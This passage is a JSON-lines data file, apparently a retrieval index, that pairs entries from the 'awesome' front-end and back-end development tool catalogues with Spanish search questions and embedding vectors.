-0.03043, -0.01658, 0.06301, -0.08197, -0.00655, -0.01053, -0.07575, 0.01966, -0.01821, 0.05384, 0.053, -0.05841, -0.02646, -0.04043, -0.14901, 0.04902, 0.07306, 0.0475, 0.01544, -0.08324, 0.00172, -0.06276, 0.04187, 0.0311, -0.00324, -0.00078, -0.05185, -0.00465, -0.07214, 0.10362, 0.01214, -0.03533, -0.02813, -0.00488, -0.03819, 0.14551, 0.03005, 0.07651, 0.01142, -0.11372, 0.00503, -0.08958, -0.02846, -0.01149, 0.05562, 0.15072, 0.03917, 0.07549, -0.02718, 0.01827, -0.07684, -0.09285, -0.019, -0.05685, 0.09012, -0.00705, -0.03072, 0.00461, -0.08518, 0.05085, -0.14096, -0.05524, -0.01751, -0.03888, -0.09232, 0.06147, -0.02782, -0.02105, -0.03785, -0.0336, 0.10297, 0.08205, 0.00854, -0.06965, -0.00084, 0.02745, -0.00578, -0.03326, 0.02271, -0.01863, 0.01328, 0.0748, -0.00509, -0.10249, 0.01184, -0.02936, 0.05332, 0.09276, 0.02705, -0.05166, 0.06758, -0.04068, -0.05691, 0.06969, 0.02735, -0.06997, 0.01264, 0.01049, 0.04173, -0.07154, -0.0489, 0.00611, 0.03502, -0.10367, -0.0907, 0.04184, -0.05648, -0.01464, 0.02509, -0.00741, 0.0211, -0.03865, 0.00641, 0.03117, 0.00383, -0.09399, 0.04538, 0.10252, -0.02781, 0.02684, -0.03105, -0.00495, -0.04188, -0.02214, -0.01189, -0.04189, 0.01509, -0.02963, 0.02304, -0.01224, 0.00752, 0.05004, -0.06013, -0.01934, -0.07469, 0.04509, 0.0566, -0.0932, -0.07782, 0.01349, 0.07054, 0.05676, 0.05413, 0.05312, 0.00712, 0.05256, 0.00165, 0.02465, 0.04301, -0.04594, -0.09765, -0.02692, -0.04375, 0.04545, -0.03481, -0.00779, 0.03143, -0.05316, 0.00963, -0.01182, 0.01919, -0.03448, -0.01845, 0.04609, -0.03465, -0.07962, -0.0027, 0.00282, -0.00581, -0.03703, -0.04005, 0.00774, -0.09916, 0.02176, -0.0372]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "cual es una herramienta para dibujar mapas y sistemas geogrΓ‘ficos en el navegador?", "v": [0.207, -0.00669, -0.03701, -0.07992, 0.02852, -0.07629, 0.00715, -0.00492, -0.03021, -0.05466, -0.00583, -0.02613, -0.11212, -0.05731, -0.00261, 0.04124, 0.10734, -0.05815, -0.02769, 0.00151, 0.01054, 0.0434, -0.01354, -0.00842, -0.08246, -0.06956, 0.02285, -0.1027, -0.19147, 0.06487, -0.03908, 0.08993, 0.05236, -0.10612, -0.17953, -0.09344, 0.08185, -0.05439, -0.06361, -0.09071, -0.05425, -0.0326, -0.0597, 0.09015, -0.06378, -0.02639, -0.03769, -0.04185, -0.01286, -0.08248, -0.03828, -0.00119, -0.12414, 0.04772, 0.06982, -0.13285, 0.26002, -0.11824, 0.05362, -0.09728, -0.01717, 0.02901, -0.0585, -0.06468, 0.01721, -0.11976, -0.0103, -0.02739, -0.03867, -7e-05, 0.09983, 0.069, 0.06439, 0.00943, 0.08211, 0.01544, -0.03875, 0.03936, 0.10946, 0.00135, 0.0407, -0.01458, -0.14994, -0.00386, -0.10269, -0.09753, 0.00822, -0.05491, 0.01363, -0.15472, 0.00169, 0.08551, 0.01093, 0.03676, -0.05076, -0.05774, 0.06492, 0.01164, 0.02087, 0.0189, 0.03111, -0.07591, -0.15503, 0.05694, -0.01081, -0.01506, 0.02919, -0.02558, -0.05484, 0.05514, 0.07529, 0.06568, 0.02274, 0.00316, 0.0037, -0.02155, 0.034, 0.02494, -0.01378, -0.16293, -0.02519, 0.02428, -0.03564, -0.01168, 0.06095, 0.01094, -0.06305, 0.07141, 0.04349, 0.01433, 0.00844, -0.0279, -0.06322, 0.01925, -0.04745, 0.03791, -0.02756, -0.09996, 0.09326, -0.00467, -0.01649, 0.06455, 0.00387, -0.1109, 0.0062, 0.10806, 0.031, -0.09296, -0.10006, -0.04958, -0.05063, -0.00294, 0.04791, 0.04781, 0.03346, 0.02313, -0.02669, 0.00319, -0.0876, 0.02963, 0.01322, 0.0408, 0.07963, 0.10427, 0.03673, -0.13255, -0.08186, -0.02749, 0.15247, 0.0643, 0.02535, 0.02994, 0.07915, -0.05448, -0.00024, -0.05035, -0.06609, -0.00305, 0.01206, -0.00314, -0.04307, -0.00717, 0.05605, 0.02078, -0.06982, -0.01351, 0.01553, -0.00209, 0.03917, 0.02582, 0.00279, 0.04714, 0.02578, 0.02101, 0.04823, 0.0024, 0.01476, 0.02728, -0.04923, -0.05005, 0.01714, -0.01139, -0.01656, -0.05221, -0.01038, 0.10881, -0.00065, 0.05842, 0.01906, 0.03431, 0.00904, -0.05067, 0.01941, -0.06392, 0.04848, -0.02032, 0.0183, 0.00703, 0.00089, -0.0503, -0.0095, 0.03479, 0.056, -0.01721, 0.05181, 0.0405, 0.06926, 0.03129, 0.01563, 0.00963, 0.0411, 0.00497, -0.01078, -0.0003, 0.06744, 0.02021, 0.06397, -0.07519, -0.0096, -0.09187, 0.02586, 0.08081, -0.00287, -0.04081, -0.03997, -0.07245, -0.03753, -0.04084, 0.00747, -0.09356, -0.02595, 0.05656, 0.09764, -0.03257, 0.03571, 0.01126]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "como puedo hacer renderizado de grΓ‘ficos utilizando WebGL o WebAssembly?", "v": [-0.07346, 0.00351, -0.12084, -0.1691, 0.02555, -0.06894, -0.0409, -0.03922, 0.04407, -0.09365, -0.09639, -0.1141, -0.11162, -0.15108, 0.13418, 0.14228, -0.08172, -0.1214, -0.02039, -0.06709, -0.04281, 0.04072, -0.08287, -0.09374, -0.02707, -0.04307, 0.04178, -0.06085, -0.02784, -0.01843, -0.08752, -0.03922, -0.00057, -0.03544, -0.19264, -0.01479, 0.06815, 0.04983, -0.01495, -0.01202, -0.082, -0.0865, -0.15986, 0.00674, 0.03001, 0.02954, -0.01953, -0.10617, -0.08976, -0.05835, -0.03346, 0.00481, -0.09898, 0.00403, -0.02338, -0.06683, 0.19073, -0.21521, 0.01684, -0.01169, 0.03984, 0.00527, -0.0043, 0.01733, -0.10177, 0.04553, -0.06193, 0.13545, -0.01598, 0.02776, 0.03495, 0.00176, 0.1074, -0.03719, 0.10109, 0.00622, -0.10698, 0.01333, 0.08508, 0.01255, -0.00151, 0.01804, -0.0779, -0.04637, -0.04209, -0.03851, -0.06176, -0.06465, 0.01165, -0.10551, 0.06862, 0.0725, -0.10157, 0.00094, -0.04434, -0.07356, 0.05947, -0.04644, 0.0553, -0.08525, -0.00812, -0.01867, -0.1397, -0.0521, 0.0992, 0.08685, 0.11977, -0.04489, -0.13045, -0.0279, 0.02135, -0.04958, -0.13335, 0.01984, 0.00492, -0.01368, 0.06794, -0.02019, 0.05424, -0.09547, -0.00481, 0.02313, -0.00492, 0.02311, -0.05683, 0.07777, -0.0097, 0.06632, -0.09246, -0.01908, -0.04944, -0.01876, -0.08065, -0.06977, -0.00712, 0.02174, 0.01413, -0.03624, 0.09696, 0.03426, 0.02012, 0.01059, 0.02697, 0.0293, 0.03859, 0.0039, 0.0418, -0.01581, -0.15396, -0.0291, -0.02048, 0.04602, -0.02634, 0.02515, -0.0305, 0.0018, -0.08922, -0.01462, -0.00512, -0.07112, 0.00177, 0.09535, 0.03435, 0.06198, -0.05133, 0.04517, -0.13673, 0.03831, 0.03451, 0.02795, 0.03912, 0.07103, -0.0183, -0.08904, 0.15149, 0.00044, -0.09163, 0.00129, -0.03019, -0.03731, -0.00514, -0.05651, 0.05563, 0.018, -0.05968, -0.03625, 0.02516, -0.00515, -0.0513, 0.03574, -0.04395, 0.06191, -0.02989, 0.04369, 0.10779, -0.0183, 0.00248, 0.01694, -0.00753, -0.04821, -0.01028, -0.03842, 0.0203, -0.06221, -0.01648, 0.07555, 0.01891, 0.0122, 0.0042, 0.01461, -0.00343, 0.01518, 0.0172, -0.06417, 0.0603, -0.01442, 0.04451, -0.02417, -0.07304, -0.03605, 0.01889, 0.02359, -0.02187, 0.04758, 0.02853, -0.00187, 0.00063, 0.00273, -0.0492, 0.00376, -0.00725, 0.022, 0.02485, -0.01704, -0.0304, 0.01432, -0.01628, -0.02707, -0.03679, -0.00795, -0.01763, 0.00998, 0.00588, 0.05014, 0.02239, -0.0885, -0.07191, -0.05394, 0.0083, -0.01747, -0.00665, -0.0121, 0.01898, 0.00237, -0.04827, 0.04411]} +{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "que programas sirven para automatizar entornos de mΓ‘quinas virtuales", "v": [0.16237, -0.02612, -0.1065, -0.18851, -0.05491, -0.04288, -0.03309, -0.0773, 0.01276, -0.15425, 0.01513, -0.1168, 0.04651, 0.01552, 0.12204, 0.13911, 0.09341, -0.13196, 0.04837, 0.16204, 0.04054, -0.03718, -0.07432, -0.00808, -0.05325, 0.14366, 0.01923, -0.08823, -0.18861, 0.04072, 0.03196, 0.1316, 0.07885, -0.05861, 0.02499, -0.20979, 0.0149, 0.11022, 0.02972, 0.02383, 0.10719, 0.08879, -0.08783, 0.00082, 0.16693, 0.01283, 0.03816, -0.01667, 0.00488, -0.06921, -0.0796, -0.10549, -0.01127, -0.04466, 0.04091, -0.16802, 0.12536, -0.06944, 0.08319, -0.0465, -0.08589, 0.02161, -0.02114, 0.10279, 0.03797, 0.0504, 0.08682, 0.00246, -0.10297, 0.03882, -0.06487, -0.02803, 0.06506, -0.04683, 0.02792, -0.01211, -0.07887, 0.04463, -0.0015, 0.04817, -0.06117, 0.00412, 0.01947, 0.02879, 0.06828, -0.02038, -0.00023, 0.01966, 0.06639, -0.06549, -0.01014, 0.11138, 0.01632, 0.03237, 0.1438, 0.05231, 0.07865, -0.01298, 0.00153, 0.08511, 0.02122, 0.00715, -0.06304, 0.08467, -0.10912, 0.0338, 0.06479, -0.06296, 0.03554, -0.02989, 0.03709, 0.01415, -0.00824, 0.01026, 0.0173, 0.02476, 0.0389, 0.06561, 0.08119, -0.06081, 0.00963, 0.06638, 0.03346, -0.08329, -8e-05, 0.03838, 0.03741, 0.06542, -0.02924, -0.04896, 0.01764, -0.00125, -0.0513, -0.01676, -0.00113, -0.006, 0.08233, -0.08417, -0.03591, -0.08479, 0.00548, 0.09727, -0.00829, -0.02631, 0.0551, -0.00326, 0.03532, -0.09621, 0.02325, 0.03325, 0.09459, 0.01042, 0.02139, 0.01636, -0.07539, 0.07008, -0.06041, 0.03382, -0.0883, 0.03253, -0.00764, 0.02125, -0.00638, 0.00248, -0.0503, 0.04232, 0.03447, 0.0224, 0.02226, 0.05641, -0.02939, 0.03096, 0.01504, 0.03247, -0.03895, 0.09231, 0.01225, -0.0048, 0.04128, 0.01264, -0.07495, -0.00012, 0.04256, -0.03776, -0.0161, 0.02109, 0.01975, -0.0099, -0.0084, 0.02834, -0.05402, -0.02775, -0.0711, -0.00044, 0.09935, 0.00942, -0.0387, 0.05401, -0.02696, -0.10188, -0.04701, 0.00646, -0.0685, -0.01244, -0.02387, 0.13569, 0.01774, -0.02893, -0.02738, 0.01891, 0.04935, -0.00857, -0.03657, -0.02221, -0.05591, -0.01071, -0.00502, -0.01541, 0.02205, -0.06035, 0.011, -0.12445, -0.02257, 0.02751, -0.00021, 0.02232, 0.05434, 0.05985, 0.06192, -0.09394, -0.03996, -0.02466, 0.01724, -0.01509, -0.02803, 0.00405, 0.02432, -0.03265, -0.03288, -0.0467, -0.0279, 0.04025, 0.00671, -0.08942, -0.05048, 0.00604, -0.06552, -0.02265, -0.0281, -0.0084, -0.03537, 0.00992, -0.02409, 0.03882, -0.02892, 0.06502]} +{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "cuales son las mejores opciones para crear aplicaciones web con Python y PHP que sean alternativas libres", "v": [-0.07176, 0.03025, -0.07545, -0.16554, -0.05383, -0.15242, 0.00049, -0.11294, -0.11884, -0.06674, 0.03095, -0.00517, -0.00294, -0.08748, -0.02181, -0.04339, -0.10487, -0.12652, 0.17142, 0.00368, -0.13835, 0.1036, -0.21903, -0.17045, 0.00359, 0.06928, 0.06663, 0.03947, -0.09251, 0.06349, 0.12835, 0.08683, 0.04801, 0.05906, -0.15274, 0.01568, 0.06169, 0.08368, -0.01658, 0.01131, -0.06451, -0.00866, -0.06523, 0.15494, -0.08986, 0.05055, -0.03015, 0.02326, -0.02948, -0.02663, 0.03229, -0.10629, -0.07384, 0.03675, 0.10852, -0.06862, 0.06505, -0.13535, 0.03501, 0.02547, -0.13315, 0.02541, 0.01626, -0.01884, 0.03308, 0.09158, 0.02265, 0.05279, -0.06971, 0.15571, -0.00181, 0.0187, -0.05143, 0.02361, 0.05287, 0.09698, -0.1068, -0.04098, -0.07872, 0.00508, -0.05804, -0.09397, -0.03194, 0.04317, -0.08734, -0.11132, 0.00379, -0.04446, 0.04872, 0.01983, 0.15943, 0.09744, 0.00093, 0.06945, -0.07604, -0.01871, 0.11347, -0.04103, 0.0482, 0.0716, -0.01893, -0.05671, -0.01365, 0.00697, -0.0194, 0.00929, 0.08961, 0.02196, -0.07538, -0.04103, 0.05963, -0.06342, 0.00578, -0.01261, -0.0578, -0.09368, -0.00494, -0.01164, -0.03551, -0.0259, -0.04408, -0.00756, -0.10916, 0.00426, 0.03991, 0.07395, 0.1051, 0.05492, -0.05764, -0.00089, -0.00104, -0.09244, -0.09535, -0.06176, -0.07756, 0.0885, 0.14916, 0.01782, 0.03627, 0.00813, -0.06298, -0.00911, -0.0208, 0.00079, 0.05038, -0.07014, -0.0122, 0.0031, -0.0152, -0.02979, 0.01931, -0.0612, -0.03359, 0.01489, -0.14296, -0.00201, -0.08859, -0.05252, -0.00851, 0.02917, 0.02752, -0.00237, -0.02213, -0.0215, 0.01603, -0.04637, -0.05319, 0.0276, 0.02952, 0.00372, -0.00086, 0.12218, 0.02729, -0.10626, 0.02399, -0.08911, -0.00488, -0.03698, 0.01006, -0.03183, -0.00731, -0.04919, -0.0426, -0.00792, 0.02393, -0.06748, 0.04525, 0.03613, -0.00638, 0.00527, -0.05753, 0.08693, -0.0605, -0.00492, 0.04485, 0.01212, 0.04138, -0.06907, -0.00507, -0.00071, -0.08407, -0.01771, -0.03134, -0.0183, -0.00342, 0.0673, -0.03201, 0.03922, 0.00687, -0.01291, -0.00224, -0.0123, 0.06911, -0.0019, 0.03769, -0.04842, 0.01823, 0.00993, 0.03671, -0.00439, -0.03246, -0.02644, -0.00649, -0.03456, -0.01387, 0.02066, -0.00679, 0.01026, -0.00906, 0.0019, -0.01786, -0.02918, -0.04393, -0.03121, -0.00777, 0.0309, -0.00258, 0.00189, -0.04229, -0.00566, 0.02089, 0.08876, -0.00892, -0.00425, -0.00432, -0.03511, -0.06106, 0.02346, -0.04086, -0.02857, -0.04643, 0.01056, 0.02716, -0.02486, -0.01916, 0.01923]} +{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "hay alguna herramienta open source para definir e infraestructura en cΓ³digo", "v": [-0.07001, 0.03573, -0.1318, -0.20081, 0.01442, -0.28532, -0.04173, 0.02151, -0.14542, -0.12984, -0.15376, -0.13695, -0.00991, -0.10448, 0.07181, 0.02522, 0.09112, -0.16305, -0.03931, -0.04366, -0.0636, 0.05069, -0.09246, 0.03347, -0.08232, -0.09332, -0.07424, 0.01642, -0.23273, -0.06712, 0.09195, 0.07292, 0.0742, -0.01415, -0.12688, 0.00489, 0.04841, 0.1107, -0.0749, -0.02206, -0.061, 0.01027, -0.00982, 0.07605, 0.09143, -0.05976, -0.04387, 0.07406, -7e-05, -0.07521, -0.09721, -0.09139, -0.08941, -0.06305, 0.08966, -0.00794, 0.12998, -0.09007, -0.07719, 0.04937, -0.04172, -0.0554, -0.02286, -0.16277, -0.03063, 0.01508, 0.0206, 0.0052, -0.14388, 0.0538, 0.0433, 0.05589, -0.04652, -0.02042, 0.10276, 0.04945, -0.03101, -0.0498, 0.04122, 0.1268, 0.06519, 0.06279, -0.06664, 0.00721, -0.06817, -0.03476, 0.06151, -0.05214, 0.04412, -0.0567, -0.02264, 0.04956, -0.0432, 0.07888, 0.04039, 0.00811, 0.01522, 0.08316, 0.05491, 0.02982, 0.10341, -0.01978, 0.00251, 0.00705, 0.09902, 0.01345, 0.0596, -0.05181, -0.06421, -0.03443, 0.0305, 0.03491, 0.0127, -0.01969, -0.03965, -0.01817, -0.03159, -0.05946, -0.03644, -0.08262, -0.03682, 0.04704, -0.06636, -0.0024, -0.04078, 0.0246, -0.01594, 0.09378, 0.03847, -0.08426, 0.0075, -0.02117, -0.03524, 0.0596, -0.07172, 0.00491, 0.06466, -0.08345, 0.01867, 0.01058, -0.02687, -0.02399, 0.00905, 0.01013, -0.04712, 0.07366, -0.00012, -0.08393, -0.08655, -0.06765, -0.01615, -0.02377, -0.09664, -0.0027, -0.09518, 0.04792, 0.03639, 0.03234, -0.11375, 0.05231, -0.07035, -0.0528, -0.03932, -0.03217, 0.00257, 0.02402, 0.0149, 0.02875, 0.06013, 0.00429, 0.0718, 0.04187, 0.05094, 0.01593, -0.01679, -0.07988, -0.08066, -0.04715, -0.04086, -0.06362, -0.01652, -0.03422, 0.00745, 0.00945, -0.00341, 0.0, -0.01956, -0.03357, -0.02673, -0.00186, 0.03168, -0.01718, 0.01269, -0.00346, 0.05902, -0.03551, 0.01216, -0.02711, 0.00339, 0.00621, -0.06711, -0.00344, -0.01264, -0.07364, 0.01393, 0.10475, -0.03761, -0.05409, -0.03513, 0.06912, 0.04099, -0.03481, 0.01917, -0.01353, 0.00687, -0.02484, -0.00849, 0.08716, 0.00601, 0.01496, 0.00587, -0.02949, -0.03618, -0.01075, 0.01595, 0.03156, 0.00705, 0.04114, 0.04134, -0.02809, 0.03092, -0.03724, -0.00534, 0.00371, 0.03361, -0.03001, -0.00501, -0.01875, -0.03457, -0.02893, 0.01816, 0.03788, -0.01874, -0.08023, -0.01067, -0.01333, 0.00207, -0.0491, -0.03941, -0.06343, -0.04305, -0.00147, 0.02649, -0.0375, -0.01197, -0.032]} +{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "ΒΏquΓ© marco de trabajo para el lado del servidor es mΓ‘s rΓ‘pido que Express?", "v": [-0.16221, -0.02374, -0.0653, -0.10867, -0.13088, -0.12124, 0.0097, -0.01971, 0.02002, -0.01364, -0.10203, -0.09932, 0.02566, -0.08592, 0.04185, 0.06944, 0.16375, 0.02397, 0.05437, -0.00437, 0.05281, -0.00555, -0.00068, -0.01872, -0.02698, -0.00951, -0.05151, 0.05113, -0.20844, 0.02719, 0.00238, 0.04093, -0.00425, 0.00643, 0.19475, -0.00377, 0.10714, 0.17884, -0.02323, 0.0783, 0.08041, -0.03578, -0.09735, -0.10756, 0.03247, -0.00615, 0.10792, -0.05886, 0.05788, 0.09126, -0.07114, -0.06223, -0.06687, -0.04408, -0.10762, 0.04984, 0.06865, -0.07952, 0.04674, 0.01281, -0.04594, 0.07519, -0.09282, -0.07511, 0.06054, -0.08248, -0.01404, -0.06552, -0.06306, 0.00454, -0.03738, 0.04678, -0.01222, -0.07135, 0.09066, 0.0539, -0.07419, 0.01688, -0.02242, 0.14934, 0.04118, 0.14938, -0.08674, 0.05677, -0.09896, -0.01565, 0.02933, -0.02699, 0.00413, 0.04747, 0.05317, 0.12242, -0.06238, 0.07555, 0.04247, -0.02537, -0.00599, -0.08823, 0.00317, 0.01291, 0.10601, -0.00721, -0.0521, -0.01808, -0.0363, 0.09963, 0.11827, 0.06107, -0.07217, -0.06003, 0.01715, 0.01077, -0.00678, 0.02134, 0.02755, -0.14677, 0.03349, 0.03848, -0.00507, 0.04211, -0.00643, 0.02753, 0.08417, 0.08299, 0.04331, -0.17053, 0.14797, -0.01481, 0.00215, -0.03184, -0.03397, -0.00651, -0.11366, -0.01808, -0.05949, 0.05116, 0.10797, -0.06544, -0.04158, -0.13356, 0.04378, -0.0209, 0.03924, 0.0707, 0.05702, -0.01336, 0.05767, -0.03623, -0.08324, 0.0186, 0.0054, -0.05819, 0.00628, -0.0102, -0.12123, -0.0234, 0.04243, -0.01726, 0.00495, -0.00712, -0.00114, 0.01581, 0.05046, 0.11677, -0.02663, 0.02459, -0.05313, 0.02541, 0.09172, 0.03475, -0.03744, -0.03651, 0.02578, -0.10956, 0.0561, -0.00627, -0.01395, -0.05953, 0.06807, 0.06394, -0.02076, -0.01179, -0.03747, 0.00504, 0.00069, -0.0186, 0.05138, 0.00635, -0.05817, 0.09792, -0.00649, -0.00953, -0.03407, -0.02507, -0.01115, -0.02708, 0.00052, -0.08747, 0.00183, -0.03958, 0.00655, -0.10801, -0.02451, -0.02912, -0.00828, -0.05023, -0.03736, 0.03535, -0.01075, 0.04093, 0.01303, -0.03543, 0.09271, 0.00312, -0.00809, 0.03819, 0.04265, -0.02496, 0.00344, -0.04797, -0.00057, 0.00978, -0.0023, -0.01052, -0.0343, 0.02796, 0.01303, -0.00525, 0.09343, -0.01843, 0.04005, 0.06708, -0.09362, -0.02259, 0.03166, 0.03157, -0.01734, 0.01749, -0.03877, -0.061, 0.06659, 0.05974, -0.03223, -0.02287, -0.06153, 0.05112, -0.02549, -0.00301, -0.05275, -0.04312, -0.0361, -0.05754, -0.00033, -0.01757, 0.02929, -0.01334]} +{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "ΒΏcon quΓ© puedo crear una aplicaciΓ³n web completa usando solo Python sin JavaScript?", "v": [-0.18385, 0.09945, -0.11351, -0.17518, 0.03443, -0.15436, -0.06668, -0.07327, -0.0641, -0.03084, -0.02853, -0.08787, -0.06839, -0.04397, -0.08907, -0.03999, 0.03096, -0.11504, 0.10225, -0.01473, -0.09961, -0.02974, -0.16216, -0.20829, 0.01091, 0.09665, 0.02881, -0.0093, -0.07978, 0.00808, 0.03538, 0.06199, 0.09973, 0.07861, -0.16671, 0.00462, 0.11807, 0.08877, -0.01721, 0.03498, -0.012, -0.04323, -0.09169, 0.13014, -0.16237, 0.07025, 0.10339, -0.01094, -0.13854, -0.00062, -0.02817, -0.07278, -0.17624, 0.04473, 0.01988, -0.06489, 0.11342, -0.14324, 0.08492, 0.01893, -0.06111, -0.04136, -0.00519, 0.01917, 0.01042, -0.08813, -0.00481, 0.05359, -0.05009, 0.0992, -0.08321, 0.03446, -0.05314, 0.01683, 0.15507, 0.03696, -0.15687, -0.06223, -0.00901, 0.03707, -0.08383, -0.05368, -0.06511, 0.02584, -0.03579, -0.0202, 0.01414, -0.02987, 0.09468, -0.08914, 0.05763, 0.07376, -0.00053, -0.04226, 0.00398, -0.01547, 0.07747, -0.02954, 0.05196, 0.02856, -0.03137, -0.07402, -0.02077, 0.01437, 0.00801, 0.04863, 0.06774, -0.0154, -0.08755, -0.02177, 0.07685, -0.07385, -0.06575, -0.0381, -0.02772, -0.04949, -0.02076, -0.01229, -0.01476, -0.03349, -0.0169, 0.06254, -0.0486, -0.00599, -0.00791, 0.05896, 0.01578, 0.1513, -0.03976, 0.00274, -0.0312, -0.04004, -0.12102, -0.00828, 0.00276, 0.13382, 0.10309, -0.00533, 0.02606, 0.02872, -0.0355, -0.00933, -0.05993, 0.04311, 0.03676, -0.01308, -0.00887, -0.05279, -0.0995, -0.0191, 0.05609, -0.06343, -0.0346, 0.03315, -0.13308, -0.05423, -0.07908, -0.02888, -0.00582, -0.03792, -0.02092, 0.03282, -0.02504, -0.02175, 0.03773, -0.05154, -0.04762, 0.01005, 0.02709, 0.06812, 0.01439, 0.05922, 0.06035, -0.07641, 0.03539, -0.08778, -0.00204, -0.0442, -0.00354, -0.03115, 0.00718, -0.06535, -0.00869, -0.03317, 0.02006, -0.04133, 0.04761, 0.02397, -0.02427, 0.01096, -0.04318, 0.07864, -0.02279, -0.01294, 0.03486, 0.04374, 0.02432, -0.04248, 0.01437, 0.0009, 0.00062, -0.01713, -0.02897, 0.00734, 0.00669, 0.02157, -0.06436, 0.01266, -0.04502, -0.02197, 0.00243, 0.00729, 0.0235, 0.04895, 0.05093, -0.01747, 0.0308, 0.06678, 0.01418, -0.03273, -0.062, 0.00813, 0.02793, 0.02506, 0.04719, 0.0361, 0.02614, -0.00675, 0.00862, 0.03206, -0.03261, -0.06638, -0.03219, -0.0046, 0.00955, -0.02673, -0.01305, 0.01738, -0.06668, 0.01334, -0.04183, 0.04496, 0.00151, -0.02789, -0.05414, -0.05404, -0.06017, 0.01614, -0.06594, -0.02048, -0.04699, -0.01401, 0.00742, -0.06561, 0.0312, 0.07595]} 